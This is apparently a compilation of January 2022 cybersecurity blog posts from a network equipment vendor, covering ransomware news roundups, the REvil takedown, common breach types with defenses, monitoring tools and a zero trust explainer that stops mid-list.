Thursday, January 27, 2022

Cybercrime in 2022: what can we expect?

0
Cybercrime in 2022

Trends indicate that cybercrime in 2022 will continue to increase and further entrench itself as a part of life both domestically and with regard to international business and political relationships.

2021 was a year of escalation in both the severity and frequency of cyberattacks. As criminals continually pried into security cracks present either due to poor security protocols or the chaos inherent to a world changing to cope with a global pandemic, news related to everything from phishing scams to ransomware attacks on healthcare facilities and state-sponsored snooping regularly made the headlines.

Why will cybercrime in 2022 increase?

A perfect storm of three major factors has been brewing over the last two years that have provided the ideal environment for bad actors to work within.

First, the sudden, sharp rise in crime can be easily attributed to the onset of the COVID-19 pandemic.The migration of in-house teams to remote workforces has had a disastrous effect on cybersecurity, as managing protocols is extremely challenging when every employee’s home networks and endpoint security features have to be taken into account. Additionally, short staffed IT teams, either spread thin due to people being out sick or looking for new work, exacerbated the issue.

Secondly, the worldwide connections that promised so much during the advent of the internet have proven to be a double edged sword. With everything from critical medical devices to kitchen appliances incorporating internet connectivity, criminals have gained entirely new ways in which to access user information or cripple devices, demanding payment from those victimized. 

Third, criminal enterprises have become very much aware that a great many organizations and companies have allowed security protocols to lapse, if they ever had them in place at all. Weak passwords, poorly maintained VPNs and more have made data-rich medical practices, tech companies, transportation agencies and even the FBI susceptible to hacking.

The world of cybersecurity as a whole seems to have been caught off guard. Faced with new, serious demands from the sudden influx of predatory malware and data thieves, unprepared companies have seen their data breached from both direct attacks and those levied against third-part vendors who have access to private information.

Cybercrime in 2022 so far

As 2022 barely gets off the ground, it’s evident that last year’s cybercrime spree shows little sign of slowing down. 

Last year’s biggest exploit persists

As of the writing of this article on January 24th, the Log4j Windows vulnerability discovered in the final weeks of 2021 continues to wreak havoc within networks that have yet to update their software or those who were too slow to do so before hackers were able to take advantage of the exploit. To make matters worse, a similar vulnerability was discovered in Java that can allow a bad actor a similar degree of control over a victimized system.

Experts expect that these vulnerabilities, while quickly absent from the news cycle in spite of their severity, will pose continual challenges throughout the year.

Healthcare and humanitarian hacks continue

The International Red Cross found itself the victim of an attack on a third party company that the organization employed to store data, exposing the private data of more than half a million people that the humanitarian enterprise was tasked with safeguarding during periods of international conflict. Considering the nature of the data stolen, it is reasonable to assume that the Red Cross will find itself forced to negotiate with the thieves.

Attacks on smaller but no less critical healthcare organizations also continue, as hospitals grapple with trouble related to the coronavirus and find their staff perpetually spread thin and overworked in environments that depend heavily on web-connected devices and computers.

COVID-19 cybercrime resurges

Scams related to the COVID-19 pandemic continue to persist, as the Omicron variant of the virus has wreaked havoc on hospital facilities and staff alike. Instances of phishing scams related to vaccination and testing have increased by more than 500% as hackers look to capitalize on the anxiety and confusion with regard to the virus’s spread. 

We can expect cybercrime in 2022 to continue to take advantage of virus-related fears, especially if further variants appear that keep tensions high.

Crypto hacks expected to escalate

The wild west world of cryptocurrency continues to create a landscape favorable to hackers, thanks to its prioritization of anonymity and the lack of federal oversight and regulation. Crypto.com, one of the largest cryptocurrency exchanges in the world, lost $30 million after hackers were able to breach their two factor authentication and transfer funds out of users’ wallets.

The breach and theft, initially downplayed by the company, illustrates that even the largest players in crypto can be pickpocketed by hackers as 2021’s many crypto-related hacks continue to echo into the new year. Cybercrime in 2022 will likely further highlight the dangers inherent to participating in the the volatile crypto market.

International cyber warfare fully realized

Along with 2021’s ransomware thieves and scammers, state-sponsored cyberattacks became front and center. With large scale hacks affecting the supply chain, the Colonial Pipeline and even the internet at large, the Biden administration and the US congress has placed a greater focus on cybercrime. An international coalition was formed to help expedite the exchange of information related to hacks, and talks between President Biden and Russian President Vladimir Putin regarding his country’s harboring of cybercrime gangs took place. 

While Moscow authorities did their part to dismantle the notorious ransomware gang known as REvil, the maneuver comes during a time of increasing international tension as Russia is believed to have sponsored attacks against Ukraine’s government computer systems. 

Putin, who views Ukraine as a Russian territory as opposed to an independent state, will likely utilize cyberattacks to supplement the pressure put on Ukraine by the presence of troops along the country’s borders. 

Russia’s activities in Ukraine illustrate the important role that cyberattacks can play when it comes to negotiation, leverage and aggression in today’s landscape. Regardless of the outcome of Russia’s actions, the playbook will surely continue to be used globally as countries with historic tension, like Israel and Iran, take skirmishes to the digital world and continue to delegitimize and hamper one another with everything from website defacement to transportation shutdowns

As the year progresses, we can expect to see cybercrime in 2022 further weaponized through strategic cyber warfare. We can also expect an international bolstering of defenses against it as cyberspace finally fully realizes its prediction as the “battleground of the future.”

What can be done about cybercrime in 2022?

The biggest hacks simply cannot be prevented by individual users. We entrust organizations to protect our data or suffer the consequences. However, most of the multibillion corporations that make headline news due to security failures are able to weather a black eye and have little to answer for, as public outrage regarding security breaches rarely reaches the level of severity that they should unless a service is visibility disrupted.

As greater regulation is considered at all levels of the US government when it comes to cybersecurity accountability, it’s important to consider your own personal habits with regard to cybercrime in 2022. Most hacks are waged against small businesses, many of whom are never able to fully recover.

Here are some personal cybersecurity basics that can help keep you safe:

Password strength is paramount. Strong, randomized passwords will help fortify you against some of the most preventable hacks.

Use multi-factor identification wherever possible. While not foolproof, hackers are opportunists and are quick to take advantage of easily-breached accounts long before they put in the work to crack into those that are more adequately protected.

Update your hardware and software. Developers are continually issuing patches to help mitigate vulnerabilities that can be used to steal your data. Update your OS and all software regularly and quickly. Swap out outdated hardware with refurbished firewalls or network switches from a reputable dealer.

Train your staff and yourself. The vast majority of hacks take place because of some degree of user error. Whether it’s an employee clicking a link that leads to malware or a fraudulent email that is designed to look like it came from your boss, knowing how to spot the fakes is critical.

Sources:

2022 is shaping up to be an epic fight to protect data by Bree Fowler, 10 Jan 2022, CNET

COVID test related scam emails still highly popular among cybercriminals 24 Jan 2022, Help Net Security

International Red Cross hack exposes half a million vulnerable people 20 Jan 2022, BBC News

Crypto.com Says ‘Incident’ Was Actually $30 Million Hack by Lorenzo Franceschi-Bicchierai, 20 Jan 2022, Vice

Cybersecurity is Still The Top Tech Threat in Healthcare, According to ECRI by Eric Wickland, Jan 24 2022, HealthLeaders
15 Important Cybersecurity Statistics in 2021 6 Feb 2021, TitanFall

Cybersecurity News week ending 23 Jan 2022 ~ NetworkTigers

0
cybersecurity news, cyberattack, warning

Cybersecurity news provided by NetworkTigers on Monday, 24 January 2022.

SAN MATEO, CA — Open Subtitles hacked due to outdated security, Ohio health system attacked with ransomware, COVID scams increase by 500% due to Omicron, Apple Safari bug exposes user data, cyberattack affects Red Cross, Minnesota family clinic breached, Beijing Olympics app contains critical privacy flaw, New Mexico school attacked with ransomware, top stolen credit card marketplace shutting down, Crypto.com hacked, Ukraine claims Russia behind “hybrid” cyberattack war.

Open Subtitles hacked due to outdated security

Open Subtitles, a popular website that is used to download thousands of subtitle files for shows and movies in different languages, has been the victim of a ransomware attack that has exposed user data including IP addresses and passwords. Open Subtitles was launched in 2006, and reportedly has not had its security measures updated since. The site was hacked via a weak administrative password. Read more.

Ohio health system attacked with ransomware

Ohio-based Memorial Health Systems has reported that in August of 2021 it suffered a ransomware attack. The attack at the time caused the rescheduling of procedures and other disruptions to services. Statements following the attack lead readers to believe that the hospital system paid a ransom to regain their data. In December of last year it was determined that patient data may have been accessed or stolen, and Memorial Health Systems has offered affected individuals free credit monitoring services. Read more.

COVID scams increase by 500% due to Omicron

Phishing scams that are designed to capitalize on pandemic anxiety have skyrocketed 500% in the wake of worries over the latest Omicron variant of the COVID-19 virus, according to a report from Barracuda Networks. Malicious actors often try to capitalize on current events, and the pandemic has provided ample opportunities for people to craft scams based on vaccinations, testing and regulation rollouts as the pandemic continues into its third year. Read more.

Apple Safari bug exposes user data

A flaw present in Safari 15 allows for the use of malicious code to track a victim’s internet activity and possibly reveal their identity according to researchers at FingerprintJS. Apple has marked the flaw as “resolved,” although they have yet to release an update to close the vulnerability. Falling victim to this exploit requires nothing more than visiting a malicious website that has been designed to take advantage of it. Read more.

Cyberattack affects Red Cross

An attack against a subcontractor used by the International Committee of the Red Cross has reportedly compromised the data of more than 500,000 “highly vulnerable” people. While the data accessed has yet to be leaked, the Red Cross has had to temporarily shut down IT infrastructure that is used to help reunite families separated by incidents such as conflict or natural disaster. It is not currently known what company the attack was launched against nor who may be responsible. Read more.

Minnesota family clinic breached

Entira Family Clinics, based in St. Paul, Minnesota, has reported that a breach had taken place involving a third party that it employs for cloud services. Nearly 200,000 patients are affected by the breach, although Entira has stated that no improper use of any data has thus far been detected. Affected individuals have been offered complimentary credit monitoring services. Read more.

Beijing Olympics app contains critical privacy flaw

The MY2022 app that attendees of the upcoming Beijing Winter Olympics need to manage documents and communication has been found to have a serious flaw that allows a third party to work around the encryption it uses. Information that users are required to upload to the app includes passport information, travel history and health data. The app’s flaws are drawing considerable concern given that Olympic events are prime targets for cyberattacks. Read more.

New Mexico school attacked with ransomware

The Albuquerque Schools student information system was attacked with ransomware, according to a statement from the Superintendent. The FBI and law enforcement are reportedly investigating the attack, which is said to not have exposed any sensitive personal information. The Superintendent’s statement did not make clear if the attack was initiated from outside the country or from within US borders. Read more.

Top stolen credit card marketplace shutting down

UniCC, a leading marketplace for the buying and selling of stolen credit card credentials, has announced that it is shutting down operations. While the administrators of the site imply that they are simply unable or unwilling to keep up with the demands of running illicit black market operations, researchers feel that pressure from authorities may be causing them to quit. Additionally, some feel that the site’s administrators are using the volatility of the underground market as a means to cut their losses while making off with any unspent balances that their users may not spend before the marketplace goes offline. Read more.

Crypto.com hacked

Popular crypto exchange Crypto.com has been hacked, with numerous reports of accounts having funds withdrawn by unauthorized users. In response, the company restricted withdrawals on the platform. The hackers are suspected to have accessed user data after getting through two factor authentication, and Crypto.com is urging all users to reset their login credentials. Read more. 

Ukraine claims Russia behind “hybrid” cyberattack war

Ukraine, after suffering a widespread cyberattack that defaced numerous government websites, is claiming that there is sufficient evidence to place blame for the incident on Russia’s efforts at initiating a “hybrid” war with the country. Tensions with Russia have been heightened as Moscow is demanding that Ukraine, a former Soviet state, not be permitted to join NATO. Read more.

More cybersecurity news

About NetworkTigers

NetworkTigers was founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms. Today, NetworkTigers provides consulting and network equipment to businesses, health care and government agencies globally. www.networktigers.com

Cybersecurity News

NetworkTigers provides the latest industry and cybersecurity news in a weekly roundup at news.networktigers.com.

10 cybersecurity breaches that you should worry about

0
Cybersecurity breach

Protecting business data is a growing challenge because cyber threats are getting more intense and sophisticated amid the rising levels of dependence on digital devices and remote work. Unfortunately, cyberattacks involving phishing and malware have placed the assets and sensitive data of individuals, organizations, and governments at risk.

Before we discuss the top 10 cybersecurity breaches that you should worry about, we’ll tell you what a cybersecurity breach is and how to detect cybersecurity threats.

What is a cybersecurity breach?

A cybersecurity breach refers to any malicious attack that damages information, disrupts digital operations, or accesses data unlawfully. Cyber threats originate from different actors, including disgruntled employees, terrorist groups, criminal organizations, corporate spies, and hostile-nation states.

High-profile cyberattacks can result in private information being exposed, especially when businesses fail to implement and test security strategies such as firewalls and encryption. Cybercriminals use an organization’s or individual’s sensitive information to access their financial accounts or steal data. 

How to detect cybersecurity threats

Nearly every day, many security incidents go unnoticed because companies do not know how to identify them. Here are ways organizations can easily detect security breaches. 

  • Unauthorized employees trying to access data and servers – Some employees can do this to determine what information and systems they can access. Warning signs include logging in from different locations or from unusual locations at abnormal times in a short time frame or unauthorized users requesting access to information that isn’t related to their tasks.
  • Changes in outbound network traffic – Organizations should not only worry about the traffic that’s coming into a network but also traffic that’s leaving their network. This includes employees sending several emails with attachments outside the organization, downloading large documents to external storage devices, and uploading large files to individual cloud applications.
  • Changes in configuration – Unapproved changes including installation of firewall changes or startup programs, added scheduled tasks, and reconfiguration of services is a sign of malicious activity.
  • Traffic sent from or to unknown locations – Traffic sent to other countries for businesses that only operate in one location may indicate malicious activity. Thus, administrators should check the legitimacy of traffic to unknown networks. 
  • Hidden files – This is considered suspicious due to their file locations, sizes, and names. It indicates the logs or data may have been manipulated. 

10 common cybersecurity breaches

Cybersecurity incidents can cause intrusions on a company’s network and cost businesses a lot of money to rectify the cybercrime damage. Let’s take a look at top cybersecurity threats and how to deal with them.

  1. Man-in-the-middle (MitM) attack

In this attack, cybercriminals intercept and change messages secretly between two people that believe they’re speaking with each other directly. The attackers manipulate the victims to access the data. Examples of these attacks include Wi-Fi eavesdropping, email, and session hijacking. 

Organizations can implement encryption protocols such as Transport Layer Security (TLS) to offer authentication, privacy, and information integrity between two communicating computer apps. Companies should also use VPNs to ensure secure connections and educate workers on the dangers of using public Wi-Fi as these connections can be hacked easily.

  1. Web application attack

This attack involves thwarting authentication mechanisms and exploiting code-level vulnerabilities in web applications. One example of this attack is a cross-site scripting attack in which cybercriminals inject malicious scripts into content from trusted websites. 

Companies should check the code early in the development stage to identify vulnerabilities using dynamic and static code scanners. Web application firewalls can also monitor networks and block attacks. Additionally, bot detection functionality should be put in place to prevent the bots from accessing the app’s data.

  1. Privilege escalation attacks

Cyberattackers who attempt to access a company’s network may try to get higher-level privileges using privilege escalation exploit. Unfortunately, successful privilege escalation attacks give attackers privileges that other users don’t have. 

These attacks happen when cybercriminals take advantage of vulnerabilities in systems or apps, programming errors, or a bug to gain access to protected information. To lower the risk of this attack, companies should identify security weak spots, implement security monitoring, and limit users’ access rights.

  1. Malware attack

Malware includes various types of viruses such as spyware, ransomware, and Trojan. Some malware is installed when workers install freeware, visit infected websites or click on an ad. 

Signs of malware include an increase in pop-up ads or unwanted internet activity, unusually low speeds, sudden loss of disk space, and repeated freezes or crashes. Installing antivirus software can detect and remove malware by performing routine system scans and providing real-time protection. 

  1. Insider threat

This is an accidental or malicious threat to a company’s information or security attributed to former/current employees and third parties including customers and contractors. Businesses should put in place a rigorous archiving and data backup routine, as well as implement antivirus and spyware scanning programs.

It is also crucial to train contractors and employees on security awareness before granting them access to the company network. Implementing employee monitoring software is also necessary to minimize the theft of intellectual property and data breaches. It helps identify malicious, careless, or disgruntled insiders.

  1. Advanced persistent threat (APT)

An APT is a targeted and prolonged attack executed by nation-states or cybercriminals. The attackers access networks and remain undetected for a long period. The attackers’ goal is usually to analyze a network’s activity and steal the information instead of ruining the network or company.

Monitoring traffic (outgoing and incoming) can help businesses prevent criminals from installing backdoors and accessing private data. Installing web application firewalls such as the Cisco ASA and NGFW Firewalls can filter out application-layer attacks like SQL injection attacks used during the APT infiltration phase.

  1. Password attack

This attack is aimed at obtaining an account’s or user’s login credentials by guessing passwords via trial and error or using password sniffers/password cracking programs. Businesses should adopt multi-factor authentication for validating users and use encryption on passwords stored in secure repositories.

Additionally, users should use strong passwords, use different passwords for multiple accounts, and change their passwords regularly. 

  1. Unauthorized attempt to access information or servers

Organizations should implement two-factor authentication to prevent cybercriminals from accessing data or severs using accounts of authorized users. Organizations should also encrypt sensitive data as it travels over multiple networks or at rest using high-quality hardware or software technology to make it difficult for attackers to access confidential information.

  1. Phishing attack

In phishing attacks, attackers masquerade as reputable people or entities in communication channels such as emails. The attackers distribute malicious attachments or links via phishing emails to obtain account information or login credentials from victims. Companies should implement gateway email filters to reduce phishing emails delivered to users’ inboxes.

  1. Denial-of-service (DoS ) attacks

DoS attacks shut down an entire network or an individual computer, making it difficult to respond to service requests. These attacks send the target some information or flood it with traffic that triggers server crash. Businesses can deal with DoS attacks by rebooting their systems, configuring servers, routers, and firewalls to block bogus traffic.

Sources

Russia’s takedown of REvil explained

0
REvil ransomware

It was recently revealed that Russian authorities had dismantled notorious ransomware as a service (RaaS) group REvil via a series of raids and arrests.

What is REvil?

REvil, also referred to as Sodinokibi, is a Russia-based ransomware gang that has plagued industry and government organizations alike with its history of brazen, high profile attacks.

In 2020, REvil engaged in attacks on victims ranging from then US president Donald Trump to celebrities including Lady Gaga and Madonna. The information stolen from Donald Trump was allegedly sold, whereas Lady Gaga suffered a leak of harmless emails and the attack on Madonna seemed to evaporate.

In 2021, REvil took its actions into high gear and rose to prominence with headline-grabbing attacks against prominent industry leaders. 

In May, Brazilian company JBS, the world’s largest supplier of meat and poultry products, was forced into a temporary shutdown as a result of REvil’s ransomware attack. Grabbing the attention of the White House, the FBI confirmed REvil’s involvement in the hack. JBS reportedly paid an $11 million ransom in Bitcoin to REvil in exchange for regaining control of their network and resuming operations.

In July of 2021, REvil set their sights on Florida-based software company Kaseya. As a result of their attack on Kaseya, over 1,000 of the company’s downstream clients felt the effects of REvil’s malware, resulting in an international ransomware crisis that affected organizations ranging from schools to rail operators to grocery stores. Kaseya was able to restore their systems with the help of a third party’s decryption key and reportedly did not pay a ransom.

Escalating attacks

As REvil’s actions, as well as cyberattacks of all types, created international havoc for organizations throughout 2021, the Biden administration sought to take Moscow to task with regard to harboring cybercriminals, regardless as to whether or not they were independent or state-sponsored. 

After a July 9th phone call between the leaders, President Biden said “I made it very clear to that the United States expects, when a ransomware operation is coming from their soil even though it’s not sponsored by the state, that we expect them to act if we give them enough information to act on who that is.”

REvil goes dark

Shortly after Biden and Putin’s conversation, it was noted that REvil’s online footprint, including websites and other digital infrastructure, had seemingly disappeared. This lead to speculation that pressure from government authorities had forced the group to go into hiding.

Research into REvil’s software also revealed that the gang had built in code that allowed it to cheat clients out of ransom money paid by victims. This revelation greatly soured the hacker community’s trust in REvil as a reliable RaaS provider.

October of 2021 saw an international team force REvil offline after hacking the gang’s servers. The next month also led to the arrest of two affiliated REvil members in Romania.

REvil dismantled

On January 14 of 2022, reports from Moscow indicated that Russia’s Federal Security Service (FSB) and the Ministry of Internal Affairs of Russia had effectively taken REvil down. Raids and at least 8 arrests were conducted at 25 properties linked to 14 REvil members across various parts of Russia.

The FSB’s official statement reported that the seizure of computer equipment, cryptocurrency, more than 426 million rubles, $600,000 US dollars and Є500,000 in Euros had taken place. Additionally, the raids resulted in the confiscation of 20 luxury vehicles that REvil members purchased with funds obtained from their ransomware operations.

According to a statement from the FSB, “the organized criminal community ceased to exist” and “the information infrastructure used for criminal purposes was neutralized” as a result of their actions.

Political motivations

Russia has been quick to assert that their deconstruction of REvil was done as an act of goodwill at the request of President Biden and other G7 nations.

However, many believe that the country’s moves against the gang were done in part to help take eyes off of Moscow during a period of escalating international tension with regard to Russia’s pressure on neighboring Ukraine. The raids took place shortly after a widespread cyberattack defaced 70 government websites belonging to the former Soviet state.

Ukrainian authorities feel that they have adequate evidence to place blame for the attack on Russia, referring to Moscow’s maneuvering as a “hybrid” war in which they engage in cyberattacks to compliment the increased physical presence of Russian troops at the countries’ shared border. Russia’s motivation is to prevent Ukraine, a country that gained independence from Russia in 1991, from further Western influence in the form of NATO membership.

Many experts believe that Russia’s actions regarding REvil have been timed in order to use the gang’s dissolution, and Russia’s continued cooperation with regard to cybercriminals, as leverage in the face of sanction threats and looming, high stakes diplomacy.

Does REvil even matter anymore?

While REvil’s takedown has important implications when it comes to the ability of government authorities to crack down on hackers, the loose structure of ransomware gangs and the continually evolving hierarchy of big players in the world of cybercrime leads some to wonder if the supposed end of REvil even matters.

Ransomware gangs have a habit of going quiet only to rebrand or reappear under a different name using similar, if not identical, malware and tactics. REvil itself is believed to be either an offshoot or a newer incarnation of a previously active gang known as GandCrab. 

BlackMatter, a relatively new RaaS provider, emerged soon after DarkSide was similarly taken down by authorities after their attack on the Colonial Pipeline. BlackMatter says that it combines the best features of now crippled ransomware gangs, REvil included. Authorities and experts agree that the actors involved in these groups have nebulous loyalties with members dipping into different groups, comparing notes and repeatedly reinventing their names and associations. 

What this means is that while a ransomware gang being rendered inactive may be perceived as a win for those who want bad actors to take a second thought with regard to their supposed immunity from consequences, the hydra-like nature of criminal enterprise means that vacuums rarely go unfilled for long.

This month’s decapitation of REvil may simply result in the growth of a new head and yet another player on the field in today’s war against ransomware purveyors.

Sources

Cybersecurity News week ending 16 Jan 2022 ~ Network Tigers

0
cybersecurity news, cyberattack

Cybersecurity news provided by NetworkTigers on Monday, 17 January 2022.

SAN MATEO, CA — CISA and FBI issue joint cybersecurity advisory pertaining to Russian cyber threats, Ukraine under suspected Russian cyberattack, Russian security reportedly dissolves REvil ransomware group, Pegasus spyware found on Salvadoran journalists’ phones, hacker able to remotely control features on Tesla automobiles, Microsoft issues massive Windows patch to address 97 security flaws, New Mexico cyberattack affects prison, Rhode Island Transit Authority breached due to file stored on employee hard drive, California city suffers data breach, fertility clinic suffers cyberattack, NAP urges users to take NAS devices offline.

CISA and FBI issue joint cybersecurity advisory pertaining to Russian cyber threats

The Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) have issues a joint cybersecurity advisory that provides an overview of Russian state-sponsored cyberthreats as they pertain to critical US infrastructure and operations. The advisory goes into detail with regard to the tactics observed by cybercriminals and best practices for both prevention and mitigation of attacks. Read more.

Ukraine under suspected Russian cyberattack

Ukraine, amidst growing tensions with Russia who is demanding that the country not join NATO, has been hit with a cyberattack that has taken down over a dozen government websites. While Ukrainian authorities have not officially cast blame for the attack, the current political climate and the fact that the hacks do not seem to be financially motivated leads most to believe that the attack was, to some degree, directed by Russia. Read more.

Russian security reportedly dissolves REvil ransomware group

Under a formal request from US authorities, Russia’s Federal Security Service (FSB) has reportedly taken down the infamous ransomware gang known as REvil. According to local information, the FSB raided 25 locations and seized assets in the form of cash, cryptocurrency and luxury vehicles. 14 individuals have been charged with crimes and the gang’s infrastructure has reportedly been “neutralized.” Read more.

Pegasus spyware found on Salvadoran journalists’ phones

Independent Salvadoran news site El Faro was found to be targeted with Pegasus spyware, with the NSO-created product found on 22 journalists’ phones. El Faro has largely been at odds with the Salvadoran government and suspects that many of the plans they had made for investigative work were foiled due to having been hacked. Read more.

Hacker able to remotely control features on Tesla automobiles

A German teenager claims that he has been able to remotely control features on 25 Tesla automobiles using a flaw he discovered in a piece of third party software. He reports that he is able to lock and unlock doors, turn headlines on and off and control the car’s sound system among other features. He has reportedly been in contact with both Tesla and the third party software company with regard to his findings. Read more.

Microsoft issues massive Windows patch to address 97 security flaws

Microsoft is intent to start the new year with an effort to put at least some of 2021’s security flaws to rest. The company has issued a patch that addresses and closes 97 vulnerabilities. Some of the fixes are meant to address Log4j vulnerabilities that continue to plague systems as hackers find new ways to leverage the exploit. Windows users are urged to update immediately. Read more.

New Mexico cyberattack affects prison

A January 5th cyberattack on the government systems of Bernalillo County, New Mexico resulted in the county’s Metropolitan Detention Center losing access to its camera feeds, automatic locks and database. The attack has forced jail officials to keep prisoners locked in their cells until services return, resulting in the jail filing an emergency notice with regard to laws that require prisoners to be provided with liberties that involve time out of their cells. Read more.

Rhode Island Transit Authority breached due to file stored on employee hard drive

In August of 2020, the personal data of more than 17,000 state workers associated with the Rhode Island Transit Authority (RIPTA) was exposed to cybercriminals after it was reportedly downloaded to an employee’s hard drive which was then hacked. It is not currently clear how or why the employee downloaded the information, with RIPTA claiming that the data was improperly shared by a third party health insurance provider. Read more.

California city suffers data breach

Gross Valley, California, has reported that the city suffered a data breach that has exposed the data of all city vendors and employees as well as anyone who has provided information to the town’s police department. Information such as Social Security numbers, credit card information, addresses and more has been exposed. The breach is stated to have begun on April 13, 2021 and lasted up until July 1, 2021. Read more.

Fertility clinic suffers cyberattack

Fertility Centers of Illinois suffered a December 27th cyberattack, exposing the sensitive personal and medical information of more than 80,000 patients. The data exposed includes Social Security numbers, names, birth dates, account passwords, PIN numbers and a multitude of other high value information. Reportedly, the attackers used a compromised administrative account to carry out the breach. Read more. 

QNAP urges users to take NAS devices offline

Taiwanese manufacturer QNAP is urging users of its network-attached storage (NAS) hardware to disconnect their devices in response to a wave of ransomware and brute-force attacks. QNAP is instructing users to run their device’s Security Counselor program to determine which router ports are at risk. Read more.

More cybersecurity news

About NetworkTigers

NetworkTigers was founded in January 1996 as Andover Consulting Group, which built and re-architected data centers for Fortune 500 firms. Today, NetworkTigers provides consulting and network equipment to businesses, health care and government agencies globally. www.networktigers.com

Cybersecurity News

NetworkTigers provides the latest industry and cybersecurity news in a weekly roundup at news.networktigers.com.

Common network security monitoring tools

0
network monitoring

Network security monitoring tools help protect digital assets, including network traffic, while also preventing and responding to unauthorized network intrusion. The progressive nature of these threats requires dynamic multi-point security solutions to protect data security.

In this post, we’ll share with you the best network security tools to combat network attacks. These tools make for a strong starting point for companies that want to secure their networks. 

The three important focuses of network security

There are three key focuses within network security that serve as a foundation of a company’s network security strategy:

  • Response
  • Detection
  • Protection

Response involves reacting to identified network security attacks and resolving them quickly. Detection refers to the assets that enable you to examine network traffic and identify issues quickly before they can cause any harm. Lastly, protection entails any policies or tools that prevent network security intrusion. 

Unfortunately, many companies do not know how to follow policies or even do it properly. This is worrying because when malicious threats come through after a network breach, there’s more at risk than the data itself

Benefits of network security monitoring software

Cyber security tools help your company protect its sensitive data, reputation, and also its ability to remain in business. Organizations that become victims of cyberattacks find themselves crippled, unable to address customer needs or deliver services effectively. Below are some major benefits of security tools.

  • Prevents cyberattacks– Network security tools help prevent attacks on a network. If your network security is weak, hackers can program malware, and threats and hamper a lot of network data through the internet. 
  • Centrally controlled – Unlike desktops security software, a central user named administrator manages the cybersecurity software tools. While the former is vulnerable to threats, the latter blocks hackers before causing any harm to the network since the software is controlled by one person and designed on an internet-free system. 
  • Data protection – A network includes sensitive information like customers’ personal data. Such critical information can be impaired by people hacking into your network. Security tools help prevent unauthorized access to the network.

9 cyber security monitoring tools you need

Your network faces threats from attackers that are targeting certain companies for specific reasons. Here are the 9 cyber security software tools that can help you address the different methods these attackers employ:

  1. Endpoint security

The corporate world is increasingly embracing the bring your own device (BYOD) trend. Unfortunately, personal devices sometimes become targets when owners use them to access company networks. Endpoint security adds a defense layer between business networks and remote devices.

  1. Access control

The amount of damage done can be limited if cyberattackers can’t access your network. However, apart from preventing unauthorized access, you also need to know that authorized users can be a threat. Access control allows you to limit resources and user access to network parts that only apply to individual users’ tasks so that you boost your network security. 

  1. Email security

Email security focuses on identifying human-related security weaknesses. Attackers convince email recipients to download malware into the integrated network or send them sensitive data using smartphones or desktops via phishing strategies. Email security helps identify suspicious emails, prevent sharing of important information, and blocks attacks. 

  1. Security information and event management (SIEM)

Sometimes pulling the correct data from different resources and tools can be challenging when you don’t have time. SIEM tools give responders the information they need to act quickly.

  1. Data loss prevention (DLP)

The human element is usually the weakest link in network security. DLP policies and technologies prevent employees and other users from misusing and allowing sensitive information out of the network or compromising the information. 

  1. Virtual private network (VPN)

VPN tools authenticate communication between an endpoint device and secure networks. Generally, remote-access VPNs use Secure Sockets Layer (SSL) or IPsec authentication. This creates an encrypted line that blocks unauthorized people from eavesdropping.

  1. Intrusion prevention systems

These systems scan and analyze network packets/traffic constantly so that threats can be identified and responded to immediately. The systems also store a database of known attack methods to allow organizations to recognize attacks quickly. 

  1. Anti-malware software

These tools are designed to identify dangerous programs and prevent them from infecting networks and spreading. Anti-malware software also resolves malware infections to reduce damage to your network.

  1. Firewalls

Firewalls act like gates that secure the borders between the internet and your network. They also manage network traffic and block unauthorized traffic while allowing through authorized traffic.

Network security monitoring tools help organizations safeguard systems, networks, and data. Cisco ASA and NGFW  Firewalls offer superior visibility into network traffic, allowing threat responders to expose unauthorized data exfiltration exploits and encrypted attacks.

Sources

Zero Trust: What it is and why it matters

0
Zero trust

Cybercrime, phishing attempts, and security hacks are all on the rise worldwide. These data breaches can be costly to businesses and individuals. They leech your valuable time, energy, and information, as well as revenue and finances. Over the next five years, the cost of cybercrime is expected to rise by 15% per year. If trends continue as expected, this will lead to a $10.5 trillion cost annually by 2025. 

Enter zero trust cybersecurity. Zero trust is an attempt to meet the moment globally. Zero trust methodology aims to address both the constantly evolving methods of cybercriminals, as well as the shifting needs of businesses, governments, and consumers. 

What is Zero Trust Cybersecurity?

Zero trust is similar to a zero tolerance policy, in that it assumes risk can come from anywhere, at any time. Most traditional security models grant some kind of lasting trust to users logging in from recognized networks, locations, or IP addresses. The zero trust model, however, assumes there is no network edge, and therefore there can be no lasting reliability. 

Instead, zero trust requires that all users, whether inside or outside an organization’s network, have their credentials be constantly checked, authenticated, and validated. This continual reauthorization is necessary before accessing or downloading any files, applications, or data within the protected network.  

Origins of Zero Trust

Zero trust was invented by John Kindervag, widely considered one of the world’s foremost cybersecurity experts. Kindervag is currently Field CTO with Palo Alto Networks after years at Forrester Research. The creation of the zero trust model is attributed to his field work as a cybercrime analyst. It has since been adopted by Google, Coca Cola, many airlines, and more. 

Notably, the zero trust model has also been recommended by the US House of Representatives. After the disastrous OPM data breach, the House issued an official recommendation that all government agencies adopt the zero trust model 

Example of a Zero Trust System

To understand how zero trust works, Google has compared the model to going to the airport. Traditionally, at the airport, you must present your identification and ticket to security before accessing the gates. This would be the equivalent of sharing your IP address (like a passport, to prove who you are), as well as your authorized destination (your ticket, showing where you plan to go). In a zero trust model, every time you log in, you must show these credentials and have them be authenticated. Similarly, every time you fly, you have to present the same proofs, even if you have flown from that airport, and to the same destination, before. This re-authentication is what sets zero trust apart from traditional network security, which assumes that users who have logged in (or checked in) once before can continue to be trusted.  

Additionally, gate access is restricted in the zero trust model, under this airport metaphor. Gone would be the option to wander freely from gate to gate, once you have presented your credentials once at security. Instead, even authorized users can only access the specific applications and destinations that they requested upon entry. This extra step limits the amount of damage that an impersonator would be able to do, assuming that they were able to evade detection at the initial checkpoint. 

Differences Between Zero Trust and VPN Networks

Both VPNs and zero trust can be deployed to enable remote users to access confidential materials. This makes both systems especially helpful as more companies continue to ask employees to work from home. Both VPNs and zero trust models are attempts to manage the increased risk from having so many different remote access points. 

However, VPNs and zero trust security manage this risk in different ways. A VPN creates a remote perimeter. It grants access to all authorized users and managed devices who log in through the VPN. Zero trust, by contrast, automatically restricts access to all users, assuming there is no trusted network. 

While zero trust is a newer concept in cybersecurity, and thus less proven than VPN technology, it is an attempt to restrict the amount of damage that a hacker can do, once they have gained access to the trusted network created by the VPN. 

Benefits of Zero Trust

Zero trust upends the traditional perimeter security model by restructuring the framework of risk. Some benefits include:

  1. Portability – The zero trust model can be accessed by users all over the globe. Gone are the physical limitations of needing a dedicated office space and company network.
